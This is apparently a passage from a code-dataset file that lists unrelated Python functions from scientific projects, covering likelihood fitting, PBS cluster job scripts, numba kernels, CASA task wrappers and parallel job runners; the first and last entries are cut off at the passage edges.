options={'maxiter': kwargs['ncall']} #'xtol': 1e-20, 'eps' : 1e-20, 'disp': True}\n #tol=None, callback=None,\n #options={'disp': False, 'minfev': 0, 'scale': None,\n #'rescale': -1, 'offset': None, 'gtol': -1,\n #'eps': 1e-08, 'eta': -1, 'maxiter': kwargs['ncall'],\n #'maxCGit': -1, 'mesg_num': None, 'ftol': -1, 'xtol': -1, 'stepmx': 0,\n #'accuracy': 0}\n )\n logging.info(self._res)\n for i, k in enumerate(self._par_names):\n fitarg[k] = self._res.x[i]\n\n logging.debug(fitarg)\n\n cmd_string = \"lambda {0}: self.__calcLikelihood({0})\".format(\n (\", \".join(self._par_names), \", \".join(self._par_names)))\n\n string_args = \", \".join(self._par_names)\n global f # needs to be global for eval to find it\n f = lambda *args: self.__calc_likelihood(*args)\n\n cmd_string = \"lambda %s: f(%s)\" % (string_args, string_args)\n logging.debug(cmd_string)\n\n # work around so that the parameters get names for minuit\n self._minimize_f = eval(cmd_string, globals(), locals())\n self._minimize_f.errordef = minuit.Minuit.LEAST_SQUARES\n\n self._m = minuit.Minuit(self._minimize_f,\n #list(fitarg['pinit'].values()),\n **fitarg['pinit'],\n #names=self._par_names\n )\n# print_level=kwargs['verbosity'],\n# errordef=kwargs['up'],\n# pedantic=kwargs['pedantic'],\n #**fitarg)\n\n for p in self._par_names:\n self._m.fixed[p] = fitarg['fix'][p]\n self._m.limits[p] = fitarg['limits'][p]\n self._m.errors[p] = fitarg['error'][p]\n\n self._m.tol = kwargs['tol']\n self._m.strategy = kwargs['strategy']\n\n logging.debug(\"tol {0:.2e}, strategy: {1:n}\".format(\n self._m.tol, self._m.strategy.strategy))\n\n self._m.migrad(ncall=kwargs['ncall']) #, precision = kwargs['precision'])", "def effective_n_jobs(n_jobs=-1):\n if n_jobs == 1:\n return 1\n\n backend, backend_n_jobs = get_active_backend()\n if n_jobs is None:\n n_jobs = backend_n_jobs\n return backend.effective_n_jobs(n_jobs=n_jobs)", "def run_on_server(func_master, *args, **kwargs):\n\n from gausspy.gaussian_job_manager import Job\n #we can pass in job_obj details with the function/class if we wish\n try:\n func_obj, job_obj = func_master\n except TypeError:\n func_obj = func_master\n job_obj = None\n\n try:\n name = func_obj.calc.label\n except AttributeError:\n try:\n name = func_obj.func_name\n except AttributeError:\n name = 'unknown'\n\n name += '_' + str(uuid.uuid1())\n\n \n #this means functions that actually have an inc_session keyword argument\n #will have the value stripped out (I'm hoping we don't come across any)\n try:\n inc_session = kwargs.pop('inc_session')\n except KeyError:\n inc_session=False\n\n try:\n savefiles = kwargs.pop('savefiles')\n except KeyError:\n savefiles = ''\n\n try: \n namefile_f = kwargs.pop('namefile_f')\n except KeyError:\n namefile_f = lambda e: name\n try:\n compress = kwargs.pop('compress')\n except KeyError:\n compress = False\n \n if inc_session:\n dill.dump_session(name + '_session.pkl')\n\n with open(name + '.pkl', 'w') as f:\n dill.dump([func_obj, args, kwargs], f)\n\n serv_home = config.get('gaussian', 'gauss_home')\n path = os.path.join(serv_home + get_active_path(), '')\n serv_work = config.get('gaussian', 'gauss_scratch')\n scratch_path = os.path.join(serv_work + get_active_path(), '')\n #if we have set the ASE and Gaussian home/work directories to nothing. I.e. we are running on the node\n #then the only way of recovering the original directories is to use the PBS shell variables that contain the directory\n #that the job was submitted from (which is the correct home directory).\n\n #scratch_path = os.environ['PBS_O_WORKDIR '].replace('/home','/work')\n\n exec_command = 'execute_calc {f_pckl};'.format(\n pth=path,\n f_pckl=path + name + '.pkl')\n\n if compress and savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n exec_command += 'tar -cvjf {n}.tar.bz2 {f};'.format(n=name, f=savefiles)\n exec_command += 'cp {n}.tar.bz2 {scratch};'.format(n=name, scratch=scratch_path)\n elif savefiles:\n exec_command += 'mkdir -p {scratch};'.format(scratch=scratch_path)\n #exec_command += 'find . -maxdepth 1 ! -iregex \"{r}\" -exec cp -r {} {scratch} \\;'.format(r=savefiles, scratch=scratch_path)\n exec_command += 'cp {f} {scratch};'.format(f=savefiles, scratch=scratch_path)\n\n if not job_obj:\n try:\n nodes = func_obj.calc.job_params['nodes']\n mem = func_obj.calc.job_params['memory'] + nodes * 150\n time = func_obj.calc.job_params['time']\n queue = func_obj.calc.job_params['queue']\n\n job_obj = Job(procs=nodes, memory=mem, walltime=time, queue=queue)\n except AttributeError:\n job_obj = Job()\n\n script = job_obj.gen_header() + exec_command\n\n with open(name + '_job_script.sh', 'w') as f:\n f.write(script)\n\n if inc_session:\n extra_files = [name + '.pkl', name + '_session.pkl']\n else:\n extra_files = [name + '.pkl']\n\n submission = remote.qsub(os.getcwd() + '/' + name + '_job_script.sh', extra_files=extra_files)\n\n os.remove(name + '.pkl')\n\n try:\n os.remove(name + '_session.pkl')\n except OSError:\n pass\n\n return submission", "def test_generic(args):\n (tol,cons,sol,test_func,low,high,shape) = args\n #if shape == 0:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n #print('here')\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t0 = time.time()\n res = minimize_qpso(test_func, x0, tol=tol)\n t1= time.time()\n converged = res.success\n qpso_converged = 0\n qpso_nit = res.nit\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n qpso_converged = 1\n # if high is None:\n #x0 = np.random.uniform(0, 2, (1000, 5))\n # else:\n x0 = init_feasible(cons, low=low, high=high, shape=shape)\n t2= time.time()\n res = minimize(test_func,x0, tol=tol)\n t3 = time.time()\n converged = res.success\n pso_converged = 0\n pso_nit = res.nit\n assert converged, res.message\n try:\n np.testing.assert_array_almost_equal(sol, res.x, 3)\n except:\n pso_converged = 1\n \n return qpso_converged, qpso_nit ,t1-t0, pso_converged , pso_nit , t3-t2", "def jacobian_numba(coordinates, points, jac, greens_function):\n east, north, upward = coordinates[:]\n point_east, point_north, point_upward = points[:]\n for i in prange(east.size):\n for j in range(point_east.size):\n jac[i, j] = greens_function(\n east[i],\n north[i],\n upward[i],\n point_east[j],\n point_north[j],\n point_upward[j],\n )", "def backsubstitution_numba(b, dofmap, num_dofs_per_element, mpc,\n global_indices):\n (slaves, slave_cells, cell_to_slave, cell_to_slave_offset,\n masters_local, coefficients, offsets) = mpc\n slaves_visited = numpy.empty(0, dtype=numpy.float64)\n\n # Loop through slave cells\n for (index, cell_index) in enumerate(slave_cells):\n cell_slaves = cell_to_slave[cell_to_slave_offset[index]:\n cell_to_slave_offset[index+1]]\n local_dofs = dofmap[num_dofs_per_element * cell_index:\n num_dofs_per_element * cell_index\n + num_dofs_per_element]\n\n # Find the global index of the slaves on the cell in the slaves-array\n global_slaves_index = []\n for gi in range(len(slaves)):\n if in_numpy_array(cell_slaves, slaves[gi]):\n global_slaves_index.append(gi)\n\n for slave_index in global_slaves_index:\n slave = slaves[slave_index]\n k = -1\n # Find local position of slave dof\n for local_dof in local_dofs:\n if global_indices[local_dof] == slave:\n k = local_dof\n assert k != -1\n # Check if we have already inserted for this slave\n if not in_numpy_array(slaves_visited, slave):\n slaves_visited = numpy.append(slaves_visited, slave)\n slaves_masters = masters_local[offsets[slave_index]:\n offsets[slave_index+1]]\n slaves_coeffs = coefficients[offsets[slave_index]:\n offsets[slave_index+1]]\n for (master, coeff) in zip(slaves_masters, slaves_coeffs):\n b[k] += coeff*b[master]", "def create_job(jobrun, vcf_filenames):\n if jobrun == \"cluster\":\n \"\"\"\n Supports only PBS clusters for now.\n \"\"\"\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n for i in pbs_scripts:\n print \"Running: qsub %s\" % i\n #os.system(\"qsub %s\" % i)\n\n elif jobrun == \"parallel-local\":\n \"\"\"\n Generate a Command list of each job and run it in parallel on different cores available on local system\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n f3 = open(command_file, 'w+')\n\n\n for i in vcf_filenames:\n job_name = os.path.basename(i)\n job_print_string = \"#PBS -N %s\\n#PBS -M apirani@med.umich.edu\\n#PBS -m abe\\n#PBS -V\\n#PBS -l nodes=1:ppn=4,pmem=4000mb,walltime=72:00:00\\n#PBS -q fluxod\\n#PBS -A esnitkin_fluxod\\n#PBS -l qos=flux\\n\\n/home/apirani/anaconda/bin/python /nfs/esnitkin/bin_group/scripts/Scripts_v2.0/variants_position_analysis/reason_job.py -filter2_only_snp_vcf_dir %s -filter2_only_snp_vcf_file %s\\n\" % (job_name, args.filter2_only_snp_vcf_dir, i)\n job_file_name = \"%s.pbs\" % (i)\n f1=open(job_file_name, 'w+')\n f1.write(job_print_string)\n f1.close()\n #os.system(\"mv %s/*.pbs %s/temp\" % (args.filter2_only_snp_vcf_dir, args.filter2_only_snp_vcf_dir))\n pbs_dir = args.filter2_only_snp_vcf_dir + \"/*.pbs\"\n pbs_scripts = glob.glob(pbs_dir)\n\n\n for i in pbs_scripts:\n f3.write(\"bash %s\\n\" % i)\n f3.close()\n with open(command_file, 'r') as fpp:\n for lines in fpp:\n lines = lines.strip()\n command_array.append(lines)\n fpp.close()\n print len(command_array)\n if args.numcores:\n num_cores = int(num_cores)\n else:\n num_cores = multiprocessing.cpu_count()\n results = Parallel(n_jobs=num_cores)(delayed(run_command)(command) for command in command_array)\n\n elif jobrun == \"parallel-single-cluster\":\n print \" \"\n else:\n \"\"\"\n Generate a Command list of each job and run it on local system one at a time\n \"\"\"\n command_array = []\n command_file = \"%s/commands_list.sh\" % args.filter2_only_snp_vcf_dir\n os.system(\"bash %s\" % command_file)", "def default_params(defaults):\n def wrap(function):\n def withargs(*args, **kwargs):\n merged = {}\n merged.update(defaults)\n merged.update(kwargs)\n return function(*args, **merged)\n return withargs\n return wrap", "def __call__(self, imagename=None, box=None, region=None, chans=None, stokes=None, axis=None, mask=None, minpts=None, multifit=None, spxtype=None, spxest=None, spxfix=None, div=None, spxsol=None, spxerr=None, model=None, residual=None, wantreturn=None, stretch=None, logresults=None, logfile=None, append=None, sigma=None, outsigma=None, ):\n if not hasattr(self, \"__globals__\") or self.__globals__ == None :\n self.__globals__=stack_frame_find( )\n #casac = self.__globals__['casac']\n casalog = self.__globals__['casalog']\n casa = self.__globals__['casa']\n #casalog = casac.casac.logsink()\n self.__globals__['__last_task'] = 'spxfit'\n self.__globals__['taskname'] = 'spxfit'\n ###\n self.__globals__['update_params'](func=self.__globals__['taskname'],printtext=False,ipython_globals=self.__globals__)\n ###\n ###\n #Handle globals or user over-ride of arguments\n #\n if type(self.__call__.func_defaults) is NoneType:\n function_signature_defaults={}\n else:\n function_signature_defaults=dict(zip(self.__call__.func_code.co_varnames[1:],self.__call__.func_defaults))\n useLocalDefaults = False\n\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n if (keyVal == None):\n #user hasn't set it - use global/default\n pass\n else:\n #user has set it - use over-ride\n if (key != 'self') :\n useLocalDefaults = True\n\n myparams = {}\n if useLocalDefaults :\n for item in function_signature_defaults.iteritems():\n key,val = item\n keyVal = eval(key)\n exec('myparams[key] = keyVal')\n self.parameters[key] = keyVal\n if (keyVal == None):\n exec('myparams[key] = '+ key + ' = self.itsdefault(key)')\n keyVal = eval(key)\n if(type(keyVal) == dict) :\n if len(keyVal) > 0 :\n exec('myparams[key] = ' + key + ' = keyVal[len(keyVal)-1][\\'value\\']')\n else :\n exec('myparams[key] = ' + key + ' = {}')\n\n else :\n print ''\n\n myparams['imagename'] = imagename = self.parameters['imagename']\n myparams['box'] = box = self.parameters['box']\n myparams['region'] = region = self.parameters['region']\n myparams['chans'] = chans = self.parameters['chans']\n myparams['stokes'] = stokes = self.parameters['stokes']\n myparams['axis'] = axis = self.parameters['axis']\n myparams['mask'] = mask = self.parameters['mask']\n myparams['minpts'] = minpts = self.parameters['minpts']\n myparams['multifit'] = multifit = self.parameters['multifit']\n myparams['spxtype'] = spxtype = self.parameters['spxtype']\n myparams['spxest'] = spxest = self.parameters['spxest']\n myparams['spxfix'] = spxfix = self.parameters['spxfix']\n myparams['div'] = div = self.parameters['div']\n myparams['spxsol'] = spxsol = self.parameters['spxsol']\n myparams['spxerr'] = spxerr = self.parameters['spxerr']\n myparams['model'] = model = self.parameters['model']\n myparams['residual'] = residual = self.parameters['residual']\n myparams['wantreturn'] = wantreturn = self.parameters['wantreturn']\n myparams['stretch'] = stretch = self.parameters['stretch']\n myparams['logresults'] = logresults = self.parameters['logresults']\n myparams['logfile'] = logfile = self.parameters['logfile']\n myparams['append'] = append = self.parameters['append']\n myparams['sigma'] = sigma = self.parameters['sigma']\n myparams['outsigma'] = outsigma = self.parameters['outsigma']\n\n if type(spxest)==float: spxest=[spxest]\n if type(spxfix)==bool: spxfix=[spxfix]\n\n result = None\n\n#\n# The following is work around to avoid a bug with current python translation\n#\n mytmp = {}\n\n mytmp['imagename'] = imagename\n mytmp['box'] = box\n mytmp['region'] = region\n mytmp['chans'] = chans\n mytmp['stokes'] = stokes\n mytmp['axis'] = axis\n mytmp['mask'] = mask\n mytmp['minpts'] = minpts\n mytmp['multifit'] = multifit\n mytmp['spxtype'] = spxtype\n mytmp['spxest'] = spxest\n mytmp['spxfix'] = spxfix\n mytmp['div'] = div\n mytmp['spxsol'] = spxsol\n mytmp['spxerr'] = spxerr\n mytmp['model'] = model\n mytmp['residual'] = residual\n mytmp['wantreturn'] = wantreturn\n mytmp['stretch'] = stretch\n mytmp['logresults'] = logresults\n mytmp['logfile'] = logfile\n mytmp['append'] = append\n mytmp['sigma'] = sigma\n mytmp['outsigma'] = outsigma\n pathname='file://' + casa['dirs']['xml'] + '/'\n trec = casac.casac.utils().torecord(pathname+'spxfit.xml')\n\n casalog.origin('spxfit')\n try :\n #if not trec.has_key('spxfit') or not casac.casac.utils().verify(mytmp, trec['spxfit']) :\n #return False\n\n casac.casac.utils().verify(mytmp, trec['spxfit'], True)\n scriptstr=['']\n saveinputs = self.__globals__['saveinputs']\n\n # Save .last file for this task execution. MPI servers don't write it (CASR-329).\n from mpi4casa.MPIEnvironment import MPIEnvironment\n do_full_logging = MPIEnvironment.is_mpi_disabled_or_client()\n if type(self.__call__.func_defaults) is NoneType:\n saveinputs=''\n else:\n saveinputs('spxfit', 'spxfit.last', myparams, self.__globals__,scriptstr=scriptstr, do_save_inputs=do_full_logging)\n\n tname = 'spxfit'\n spaces = ' '*(18-len(tname))\n casalog.post('\\n##########################################'+\n '\\n##### Begin Task: ' + tname + spaces + ' #####')\n # Don't do telemetry from MPI servers (CASR-329)\n if do_full_logging and casa['state']['telemetry-enabled']:\n #casalog.poststat('Begin Task: ' + tname)\n task_starttime = str(datetime.datetime.now())\n if type(self.__call__.func_defaults) is NoneType:\n casalog.post(scriptstr[0]+'\\n', 'INFO')\n else:\n casalog.post(scriptstr[1][1:]+'\\n', 'INFO')\n\n # Effective call to the task as defined in gcwrap/python/scripts/task_*\n result = spxfit(imagename, box, region, chans, stokes, axis, mask, minpts, multifit, spxtype, spxest, spxfix, div, spxsol, spxerr, model, residual, wantreturn, stretch, logresults, logfile, append, sigma, outsigma)\n\n if do_full_logging and casa['state']['telemetry-enabled']:\n task_endtime = str(datetime.datetime.now())\n casalog.poststat( 'Task ' + tname + ' complete. Start time: ' + task_starttime + ' End time: ' + task_endtime )\n casalog.post('##### End Task: ' + tname + ' ' + spaces + ' #####'+\n '\\n##########################################')\n\n except Exception, instance:\n if(self.__globals__.has_key('__rethrow_casa_exceptions') and self.__globals__['__rethrow_casa_exceptions']) :\n raise\n else :\n #print '**** Error **** ',instance\n tname = 'spxfit'\n casalog.post('An error occurred running task '+tname+'.', 'ERROR')\n pass\n casalog.origin('')\n\n return result", "def get_pij_numba(d, scale, i):\n \n d_scaled = -d/scale\n d_scaled -= np.max(d_scaled)\n exp_D = np.exp(d_scaled)\n exp_D[i] = 0\n \n return exp_D/np.sum(exp_D)", "def addJob(self, args, functionToRun, identifier, metadata=None, forceUseThreads = False, uniqueHandler=\"any\", clientQueue = False, groupInfo = None):\n assert \"original_function\" in dir(functionToRun), \"to parallelize a function, it must be\" \\\n \" decorated with RAVEN Parallel decorator\"\n if self._server is None or forceUseThreads:\n internalJob = Runners.factory.returnInstance('SharedMemoryRunner', args,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n else:\n if self._parallelLib == ParallelLibEnum.dask:\n arguments = tuple([self._server] + list(args))\n else:\n arguments = args\n if self._parallelLib == ParallelLibEnum.dask:\n internalJob = Runners.factory.returnInstance('DaskRunner', arguments,\n functionToRun.original_function,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n\n elif self._parallelLib == ParallelLibEnum.ray:\n internalJob = Runners.factory.returnInstance('RayRunner', arguments,\n functionToRun.remote,\n identifier=identifier,\n metadata=metadata,\n uniqueHandler=uniqueHandler,\n profile=self.__profileJobs)\n # set the client info\n internalJob.clientRunner = clientQueue\n # set the groupping id if present\n if groupInfo is not None:\n groupId = groupInfo['id']\n # TODO: create method in Runner to set flags,ids,etc in the instanciated runner\n internalJob.groupId = groupId\n if groupId not in self.__batching:\n # NOTE: The size of the group is only set once the first job beloning to a group is added\n # ***** THE size of a group is IMMUTABLE *****\n self.__batching[groupId] = {\"counter\": 0, \"ids\": [], \"size\": groupInfo['size'], 'finished': []}\n self.__batching[groupId][\"counter\"] += 1\n if self.__batching[groupId][\"counter\"] > self.__batching[groupId][\"size\"]:\n self.raiseAnError(RuntimeError, f\"group id {groupId} is full. Size reached:\")\n self.__batching[groupId][\"ids\"].append(identifier)\n # add the runner in the Queue\n self.reAddJob(internalJob)", "def run_job(job, interrupt_if_necessary):", "def test_diff_method_None_jit():\n\n dev = qml.device(\"default.qubit.jax\", wires=1, shots=10)\n\n @jax.jit\n def wrapper(x):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RX(x, wires=0)\n qml.expval(qml.PauliZ(0))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n return qml.execute([tape], dev, gradient_fn=None)\n\n assert jax.numpy.allclose(wrapper(jax.numpy.array(0.0))[0], 1.0)", "def round_numba(g):\n N = len(g)\n gr = np.zeros(N)\n for i in range(N):\n gr[i] = round(g[i])\n return gr", "def run_job(args):\n\n global stop_all\n global jobfiles_global\n global jobwcl\n\n jobwcl = WCL()\n jobfiles = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n jobfiles_global = {'infullnames': [args.config, args.workflow],\n 'outfullnames': [],\n 'output_putinfo': {}}\n\n jobstart = time.time()\n with open(args.config, 'r') as wclfh:\n jobwcl.read(wclfh, filename=args.config)\n jobwcl['verify_files'] = miscutils.checkTrue('verify_files', jobwcl, False)\n jobwcl['jobroot'] = os.getcwd()\n jobwcl['job_max_usage'] = 0\n #jobwcl['pre_job_disk_usage'] = pfwutils.diskusage(jobwcl['jobroot'])\n jobwcl['pre_job_disk_usage'] = 0\n\n # Save pointers to archive information for quick lookup\n if jobwcl[pfwdefs.USE_HOME_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_HOME_ARCHIVE_OUTPUT] != 'never':\n jobwcl['home_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.HOME_ARCHIVE]]\n else:\n jobwcl['home_archive_info'] = None\n\n if jobwcl[pfwdefs.USE_TARGET_ARCHIVE_INPUT] != 'never' or \\\n jobwcl[pfwdefs.USE_TARGET_ARCHIVE_OUTPUT] != 'never':\n jobwcl['target_archive_info'] = jobwcl[pfwdefs.SW_ARCHIVESECT][jobwcl[pfwdefs.TARGET_ARCHIVE]]\n else:\n jobwcl['target_archive_info'] = None\n\n # run the tasks (i.e., each wrapper execution)\n stop_all = miscutils.checkTrue('stop_on_fail', jobwcl, True)\n\n try:\n jobfiles['infullnames'] = gather_initial_fullnames()\n jobfiles_global['infullnames'].extend(jobfiles['infullnames'])\n miscutils.coremakedirs('log')\n miscutils.coremakedirs('outputwcl')\n exitcode, jobfiles = job_workflow(args.workflow, jobfiles, jobwcl)\n except Exception:\n (extype, exvalue, trback) = sys.exc_info()\n print '!' * 60\n traceback.print_exception(extype, exvalue, trback, file=sys.stdout)\n exitcode = pfwdefs.PF_EXIT_FAILURE\n print \"Aborting rest of wrapper executions. Continuing to end-of-job tasks\\n\\n\"\n\n try:\n create_junk_tarball(jobwcl, jobfiles, exitcode)\n except:\n print \"Error creating junk tarball\"\n # if should transfer at end of job\n if jobfiles['output_putinfo']:\n print \"\\n\\nCalling file transfer for end of job (%s files)\" % \\\n (len(jobfiles['output_putinfo']))\n\n copy_output_to_archive(jobwcl, jobfiles, jobfiles['output_putinfo'], 'job',\n 'job_output', exitcode)\n else:\n print \"\\n\\n0 files to transfer for end of job\"\n if miscutils.fwdebug_check(1, \"PFWRUNJOB_DEBUG\"):\n miscutils.fwdebug_print(\"len(jobfiles['outfullnames'])=%s\" % \\\n (len(jobfiles['outfullnames'])))\n print \"\\nDESDMTIME: pfwrun_job %0.3f\" % (time.time()-jobstart)\n return exitcode", "def serial_job(func, inputs):\n\n output = []\n for i, finput in enumerate(inputs):\n foutput = func(finput)\n output.append(foutput)\n output = np.array(output, dtype=object)\n\n return np.transpose(output)", "def __call__(self, *args, **kwargs):\n\n wait_for = kwargs.pop(\"wait_for\", None)\n\n # {{{ run control\n\n key_bits = kwargs.pop(\"key_bits\", None)\n if key_bits is None:\n key_bits = int(np.iinfo(self.key_dtype).bits)\n\n n = len(args[self.first_array_arg_idx])\n\n allocator = kwargs.pop(\"allocator\", None)\n if allocator is None:\n allocator = args[self.first_array_arg_idx].allocator\n\n queue = kwargs.pop(\"allocator\", None)\n if queue is None:\n queue = args[self.first_array_arg_idx].queue\n\n args = list(args)\n\n base_bit = 0\n while base_bit < key_bits:\n sorted_args = [\n cl.array.empty(queue, n, arg_descr.dtype, allocator=allocator)\n for arg_descr in self.arguments\n if arg_descr.name in self.sort_arg_names]\n\n scan_args = args + sorted_args + [base_bit]\n\n last_evt = self.scan_kernel(*scan_args,\n **dict(queue=queue, wait_for=wait_for))\n wait_for = [last_evt]\n\n # substitute sorted\n for i, arg_descr in enumerate(self.arguments):\n if arg_descr.name in self.sort_arg_names:\n args[i] = sorted_args[self.sort_arg_names.index(arg_descr.name)]\n\n base_bit += self.bits\n\n return [arg_val\n for arg_descr, arg_val in zip(self.arguments, args)\n if arg_descr.name in self.sort_arg_names], last_evt\n\n # }}}", "def process_kernel_arg(\n self, var, llvm_arg, arg_type, index, modified_arrays, sycl_queue_val\n ):\n if isinstance(arg_type, types.npytypes.Array):\n if llvm_arg is None:\n raise NotImplementedError(arg_type, var)\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n storage = cgutils.alloca_once(self.builder, utils.LLVMTypes.int64_t)\n self.builder.store(self.context.get_constant(types.int64, 0), storage)\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n storage,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle array size\n array_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 2),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n array_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle itemsize\n item_size_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 3),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n item_size_member,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Calculate total buffer size\n total_size = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.intp),\n size=utils.get_one(context=self.context),\n name=\"total_size\" + str(self.cur_arg),\n )\n self.builder.store(\n self.builder.sext(\n self.builder.mul(\n self.builder.load(array_size_member),\n self.builder.load(item_size_member),\n ),\n utils.get_llvm_type(context=self.context, type=types.intp),\n ),\n total_size,\n )\n\n # Handle data\n data_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 4),\n ],\n )\n\n # names are replaced using legalize names, we have to do the same\n # here for them to match.\n legal_names = legalize_names([var])\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.voidptr)\n\n if isinstance(arg_type, nus.UsmSharedArrayType):\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n else:\n malloc_fn = DpctlCAPIFnBuilder.get_dpctl_malloc_shared(\n builder=self.builder, context=self.context\n )\n memcpy_fn = DpctlCAPIFnBuilder.get_dpctl_queue_memcpy(\n builder=self.builder, context=self.context\n )\n event_del_fn = DpctlCAPIFnBuilder.get_dpctl_event_delete(\n builder=self.builder, context=self.context\n )\n event_wait_fn = DpctlCAPIFnBuilder.get_dpctl_event_wait(\n builder=self.builder, context=self.context\n )\n\n # Not known to be USM so we need to copy to USM.\n buffer_name = \"buffer_ptr\" + str(self.cur_arg)\n # Create void * to hold new USM buffer.\n buffer_ptr = cgutils.alloca_once(\n self.builder,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n name=buffer_name,\n )\n # Setup the args to the USM allocator, size and SYCL queue.\n args = [\n self.builder.load(total_size),\n self.builder.load(sycl_queue_val),\n ]\n # Call USM shared allocator and store in buffer_ptr.\n self.builder.store(self.builder.call(malloc_fn, args), buffer_ptr)\n\n if legal_names[var] in modified_arrays:\n self.write_buffs.append((buffer_ptr, total_size, data_member))\n else:\n self.read_only_buffs.append((buffer_ptr, total_size, data_member))\n\n # We really need to detect when an array needs to be copied over\n if index < self.num_inputs:\n args = [\n self.builder.load(sycl_queue_val),\n self.builder.load(buffer_ptr),\n self.builder.bitcast(\n self.builder.load(data_member),\n utils.get_llvm_type(\n context=self.context, type=types.voidptr\n ),\n ),\n self.builder.load(total_size),\n ]\n event_ref = self.builder.call(memcpy_fn, args)\n self.builder.call(event_wait_fn, [event_ref])\n self.builder.call(event_del_fn, [event_ref])\n\n self._form_kernel_arg_and_arg_ty(self.builder.load(buffer_ptr), ty)\n\n # Handle shape\n shape_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 5),\n ],\n )\n\n for this_dim in range(arg_type.ndim):\n shape_entry = self.builder.gep(\n shape_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_dim),\n ],\n )\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n shape_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n # Handle strides\n stride_member = self.builder.gep(\n llvm_arg,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, 6),\n ],\n )\n\n for this_stride in range(arg_type.ndim):\n stride_entry = self.builder.gep(\n stride_member,\n [\n self.context.get_constant(types.int32, 0),\n self.context.get_constant(types.int32, this_stride),\n ],\n )\n\n ty = numba_type_to_dpctl_typenum(context=self.context, type=types.int64)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n stride_entry,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )\n\n else:\n ty = numba_type_to_dpctl_typenum(context=self.context, type=arg_type)\n self._form_kernel_arg_and_arg_ty(\n self.builder.bitcast(\n llvm_arg,\n utils.get_llvm_type(context=self.context, type=types.voidptr),\n ),\n ty,\n )", "def ExecuteInstanceDeterministicAdaptiveRefinementAux_Functionality(pickled_model,pickled_project_parameters,current_analysis_stage,random_variable,previous_computational_time,mapping_flag,pickled_mapping_reference_model,print_to_file,filename,open_mp_threads):\n\n start_time = time.time()\n # overwrite the old model serializer with the unpickled one\n model_serializer = pickle.loads(pickled_model)\n current_model = KratosMultiphysics.Model()\n model_serializer.Load(\"ModelSerialization\",current_model)\n del(model_serializer)\n # overwrite the old parameters serializer with the unpickled one\n serialized_project_parameters = pickle.loads(pickled_project_parameters)\n current_project_parameters = KratosMultiphysics.Parameters()\n serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n 